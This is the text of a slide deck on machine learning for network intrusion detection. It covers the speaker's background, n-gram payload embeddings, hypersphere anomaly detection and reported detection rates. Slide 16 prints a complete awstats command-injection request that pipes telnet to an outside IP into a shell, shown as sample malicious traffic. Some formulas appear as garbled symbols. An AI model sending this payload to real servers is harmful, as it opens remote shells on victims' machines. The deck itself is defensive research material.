![Page 1: Machine Learning for Network Intrusion Detection Dr. Marius Kloft, Dipl.-Math. TexPoint fonts used in EMF. Read the TexPoint manual before you delete this](https://reader030.vdocuments.us/reader030/viewer/2022032703/56649d055503460f949d8fb9/html5/thumbnails/1.jpg)
1
Machine Learning
for Network Intrusion Detection
Dr. Marius Kloft, Dipl.-Math.
![Page 2: Machine Learning for Network Intrusion Detection Dr. Marius Kloft, Dipl.-Math. TexPoint fonts used in EMF. Read the TexPoint manual before you delete this](https://reader030.vdocuments.us/reader030/viewer/2022032703/56649d055503460f949d8fb9/html5/thumbnails/2.jpg)
2
Personal Information
• Dr. Marius Kloft
▫ Studies
in physics and mathematics
▫at University of Marburg
in computer science
▫ in Berkeley and Berlin
▫ Degrees
Dipl.-Mathematiker, 2006
▫Thesis in pure math
Dr. rer. nat., 2011
▫Thesis in cs and statistics
• PhD advisors
▫ Prof. Dr. Klaus-Robert Müller
(EECS, TU Berlin)
▫ Prof. Dr. Peter L. Bartlett
(EECS & Statistics, UC Berkeley)
▫ Prof. Dr. Gilles Blanchard
(Statistics, Uni Potsdam)
Berkeley, California
![Page 3: Machine Learning for Network Intrusion Detection Dr. Marius Kloft, Dipl.-Math. TexPoint fonts used in EMF. Read the TexPoint manual before you delete this](https://reader030.vdocuments.us/reader030/viewer/2022032703/56649d055503460f949d8fb9/html5/thumbnails/3.jpg)
3
Dr. Marius Kloft
• Current occupation
▫ Post-Doc
jointly appointed at
Machine Learning Laboratory, TU Berlin
▫Head: Prof. Dr. Klaus-Robert Müller
Friedrich-Miescher Laboratory, Max Planck Society, Tübingen
▫Head: Dr. Gunnar Rätsch
(will be transferred to Sloan Center for Cancer Research, New York)
• I am heading the SeqML preoject team (Berlin/Tübingen)
▫ 2 PhD student
▫ 4 Master students
▫ PI: Prof. Müller
▫ Goal
development of intelligent algorithms (“machine learning”)
▫ for computational genome annotation
![Page 4: Machine Learning for Network Intrusion Detection Dr. Marius Kloft, Dipl.-Math. TexPoint fonts used in EMF. Read the TexPoint manual before you delete this](https://reader030.vdocuments.us/reader030/viewer/2022032703/56649d055503460f949d8fb9/html5/thumbnails/4.jpg)
4
Dr. Marius Kloft
• Research interests
▫ Statistical machine learning methods
Development of new algorithms
▫mathematical optimization thereof
Analysis of their statistical properties
▫ in terms of probabilistic bounds
Multiple Kernel Learning
▫My PhD thesis: “Lp-Norm Multiple Kernel Learning”
▫ Applications
Detection of genes in genomic DNA
Detection of attacks in computer networks
Categorization of images
![Page 5: Machine Learning for Network Intrusion Detection Dr. Marius Kloft, Dipl.-Math. TexPoint fonts used in EMF. Read the TexPoint manual before you delete this](https://reader030.vdocuments.us/reader030/viewer/2022032703/56649d055503460f949d8fb9/html5/thumbnails/5.jpg)
5
Machine Learning Laboratory, TU Berlin
• Some facts
▫ Head
Prof. Dr. Klaus-Robert Müller
▫ Scientists
11 post-Docs
35 PhD students
▫ Research focus
Development of novel intelligent algorithms
▫ for analysis of complex data
• Remind project
▫ Joint project of TU Berlin and Fraunhofer FIRST, Berlin
▫ Development of intelligent methods for detecting intrusions in computer networks
▫ Facts
Until 2010
▫2 post-docs
▫5 PhD students
Spin-Off “Trifense GmbH” awarded first price of „Gründungswettbewerb“ (BMWi)
![Page 6: Machine Learning for Network Intrusion Detection Dr. Marius Kloft, Dipl.-Math. TexPoint fonts used in EMF. Read the TexPoint manual before you delete this](https://reader030.vdocuments.us/reader030/viewer/2022032703/56649d055503460f949d8fb9/html5/thumbnails/6.jpg)
6
Machine Learning for Intrusion DetectionJoint work with the members of the Remind project team:
Konrad Rieck, Pavel Laskov, Ulf Brefeld, Christian Gehl, Tammo Krüger,
Patrick Düssel, Nico Görnitz, Rene Gerstenberger, Guido Schwenk
![Page 7: Machine Learning for Network Intrusion Detection Dr. Marius Kloft, Dipl.-Math. TexPoint fonts used in EMF. Read the TexPoint manual before you delete this](https://reader030.vdocuments.us/reader030/viewer/2022032703/56649d055503460f949d8fb9/html5/thumbnails/7.jpg)
7
Machine Learning for Intrusion Detection
Talk Overview
Danger from the internet
What is machine learning (ML)?
Algorithms for intrusion detection
Empirical analysis
![Page 8: Machine Learning for Network Intrusion Detection Dr. Marius Kloft, Dipl.-Math. TexPoint fonts used in EMF. Read the TexPoint manual before you delete this](https://reader030.vdocuments.us/reader030/viewer/2022032703/56649d055503460f949d8fb9/html5/thumbnails/8.jpg)
8
Danger from Internet
• Internet as a risk factor:
▫ Omnipresence of computer worms, viruses and trojans
▫ Major damage to companies and customers
▫ Increasing criminalization
![Page 9: Machine Learning for Network Intrusion Detection Dr. Marius Kloft, Dipl.-Math. TexPoint fonts used in EMF. Read the TexPoint manual before you delete this](https://reader030.vdocuments.us/reader030/viewer/2022032703/56649d055503460f949d8fb9/html5/thumbnails/9.jpg)
9
Why do we still get hacked?
• New vulnerabilities are discovered
▫ 2,000-3,000 vulnerabilities per year
• New attacks are developed
▫ high degree of automation
• Incident response is too slow
![Page 10: Machine Learning for Network Intrusion Detection Dr. Marius Kloft, Dipl.-Math. TexPoint fonts used in EMF. Read the TexPoint manual before you delete this](https://reader030.vdocuments.us/reader030/viewer/2022032703/56649d055503460f949d8fb9/html5/thumbnails/10.jpg)
10
How secure are modern detection tools?
• Experiment
▫ Current instances of malware were collected from a Nepenthes honeypot
▫ Files were scanned with Avira AntiVir
• Results
▫ First scan:
• Conclusion
▫ After four weeks still 15% of malware instances not recognized!
▫ Second scan:
![Page 11: Machine Learning for Network Intrusion Detection Dr. Marius Kloft, Dipl.-Math. TexPoint fonts used in EMF. Read the TexPoint manual before you delete this](https://reader030.vdocuments.us/reader030/viewer/2022032703/56649d055503460f949d8fb9/html5/thumbnails/11.jpg)
11
Machine Learning for Intrusion Detection
Talk Overview
Danger from the internet
What is machine learning (ML)?
Algorithms for intrusion detection
Empirical Analysis
![Page 12: Machine Learning for Network Intrusion Detection Dr. Marius Kloft, Dipl.-Math. TexPoint fonts used in EMF. Read the TexPoint manual before you delete this](https://reader030.vdocuments.us/reader030/viewer/2022032703/56649d055503460f949d8fb9/html5/thumbnails/12.jpg)
12
What is statistical machine learning?
• Given:
▫ Data
E.g., xi could be a HTTP request (e.g., computer attack)
▫ Concepts
E.g., yi=1 could mean that xi is a computer attack
• Goal:
▫ Finding a function f that models the dependency between xi and yi
i.e.,
▫ So that f generalizes to novel, previously unseen (x,y)
i.e.,
• 2-step approach:
▫ 1. Training:
Input data and concepts into learning algorithm
Learning Algorithm outputs f
▫ 2. Prediction:
Use f(x) to predict labels y for new, unseen x
• Core idea
▫ Choose an f that
Fits the data well
But is not too “complex”
x1;¢¢¢;xn
y1;¢¢¢;yn 2 f0;1g
8i : f (xi ) ¼yi
f (x) ¼y
![Page 13: Machine Learning for Network Intrusion Detection Dr. Marius Kloft, Dipl.-Math. TexPoint fonts used in EMF. Read the TexPoint manual before you delete this](https://reader030.vdocuments.us/reader030/viewer/2022032703/56649d055503460f949d8fb9/html5/thumbnails/13.jpg)
13
Example: Trade-off of Fit and Complexity
• Data:
• Machine learning solution:
▫ Not too complex, not too easy
• Which f to choose?
▫ Linear f
Misses out two points
(too simple)
▫ Polynomial f
Pro: Perfect on training data
Contra: does not generalize to new data
▫Too complex
![Page 14: Machine Learning for Network Intrusion Detection Dr. Marius Kloft, Dipl.-Math. TexPoint fonts used in EMF. Read the TexPoint manual before you delete this](https://reader030.vdocuments.us/reader030/viewer/2022032703/56649d055503460f949d8fb9/html5/thumbnails/14.jpg)
14
Machine Learning for Intrusion Detection
Talk Overview
Danger from the internet
What is machine learning (ML)?
Algorithms for intrusion detection
Empirical Analysis
![Page 15: Machine Learning for Network Intrusion Detection Dr. Marius Kloft, Dipl.-Math. TexPoint fonts used in EMF. Read the TexPoint manual before you delete this](https://reader030.vdocuments.us/reader030/viewer/2022032703/56649d055503460f949d8fb9/html5/thumbnails/15.jpg)
15
Benefits of Machine Learning to Intrusion Detection
• Ability to generalize from large amounts of data
▫ automation of decision making
▫ faster incident response times
• Understanding of statistical foundations of empirical inference
▫ better accuracy, small false alarm rates
• Ability to detect novelty
▫ protection against new attacks
![Page 16: Machine Learning for Network Intrusion Detection Dr. Marius Kloft, Dipl.-Math. TexPoint fonts used in EMF. Read the TexPoint manual before you delete this](https://reader030.vdocuments.us/reader030/viewer/2022032703/56649d055503460f949d8fb9/html5/thumbnails/16.jpg)
16
How Does Network Payload Look Like?
• Innocuous payload
▫ GET / HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aAccept-Language: en\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0aCookie: POPUPCHECK=1150521721386\x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3\x0d\x0aConnection: keep-alive\x0d\x0aHost: www.spiegel.de
• Malicious payload
▫ GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;sleep%207200%7ctelnet%20194%2e95%2e173%2e219%204321%7cwhile%20%3a%20%3b%20do%20sh%20%26%26%20break%3b%20done%202%3e%261%7ctelnet%20194%2e95%2e173%2e219%204321;echo%20YYY;echo|HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\x0d\x0aHost: wuppi.dyndns.org:80\x0d\x0aConnection: Close\x0d\x0a\x0d\x0a
![Page 17: Machine Learning for Network Intrusion Detection Dr. Marius Kloft, Dipl.-Math. TexPoint fonts used in EMF. Read the TexPoint manual before you delete this](https://reader030.vdocuments.us/reader030/viewer/2022032703/56649d055503460f949d8fb9/html5/thumbnails/17.jpg)
17
From Network Payload to Vectors
• General idea
▫ count occurrences of substrings (“n-grams”)
Example:
▫ Define an appropriate embedding function:
▫ In the end, payload is represented as vectors:
©("abracadabra") = (2;2;1;1;1;1;1)
![Page 18: Machine Learning for Network Intrusion Detection Dr. Marius Kloft, Dipl.-Math. TexPoint fonts used in EMF. Read the TexPoint manual before you delete this](https://reader030.vdocuments.us/reader030/viewer/2022032703/56649d055503460f949d8fb9/html5/thumbnails/18.jpg)
18
Detection of New Attacks
• Anomaly-based machine learning approach
▫ Represent network payload as vectors
▫ Finding a hypersphere
that encloses the innocuous data (blue circles)
and generalizes to new data
▫ Points outside of the hypersphere (red circles)
are flagged as being anomalous
(Rieck et al., DIMVA 2007)
![Page 19: Machine Learning for Network Intrusion Detection Dr. Marius Kloft, Dipl.-Math. TexPoint fonts used in EMF. Read the TexPoint manual before you delete this](https://reader030.vdocuments.us/reader030/viewer/2022032703/56649d055503460f949d8fb9/html5/thumbnails/19.jpg)
19
How well does our system work?
• Detection results
▫ Evaluation on a real attack dataset generated by a penetration testing expert
▫ Detection of 80-93% of unknown attacks in HTTP, FTP and SMTP protocols without false alarms
▫ Major improvement of accuracy in comparison to the standard signature-based IDS Snort
![Page 20: Machine Learning for Network Intrusion Detection Dr. Marius Kloft, Dipl.-Math. TexPoint fonts used in EMF. Read the TexPoint manual before you delete this](https://reader030.vdocuments.us/reader030/viewer/2022032703/56649d055503460f949d8fb9/html5/thumbnails/20.jpg)
20
Outlook: Extensions of the Framework
• Active learning
▫ Finding data points
that – when presented to security expert – maximally help performance of the system
▫ Problem: which labels to present?
▫ In a nutshell: focus on points that contain novel, uncertain information
• Automatic feature selection
▫ Payloads can be represented by various feature embeddings
Which feature embedding to take?
▫ “Multiple Kernel Learning” approach:
Use all embeddings simultaneously
▫But take a weighted combination
▫Do it automatically at training time
(e.g., Görnitz, Kloft et al., ACM AISEC 2009, ECML 2009)
(M. Kloft, PhD thesis, 2011)
(e.g., Kloft et al., ACM AISEC 2008, ECML 2009, NIPS 2009, ECML 2010, NIPS 2011, JMLR 2011)
![Page 21: Machine Learning for Network Intrusion Detection Dr. Marius Kloft, Dipl.-Math. TexPoint fonts used in EMF. Read the TexPoint manual before you delete this](https://reader030.vdocuments.us/reader030/viewer/2022032703/56649d055503460f949d8fb9/html5/thumbnails/21.jpg)
21
Conclusions
• Intrusion detection
▫ Detecting malicious payload in network streams
• Machine learning approach
▫ Embedding of application payloads in vector spaces
▫ Detection of anomalies in embedded data
• Empirical analysis
▫ Detection of 80-93% unknown attacks
no false positives
▫ Allows one to find novel attacks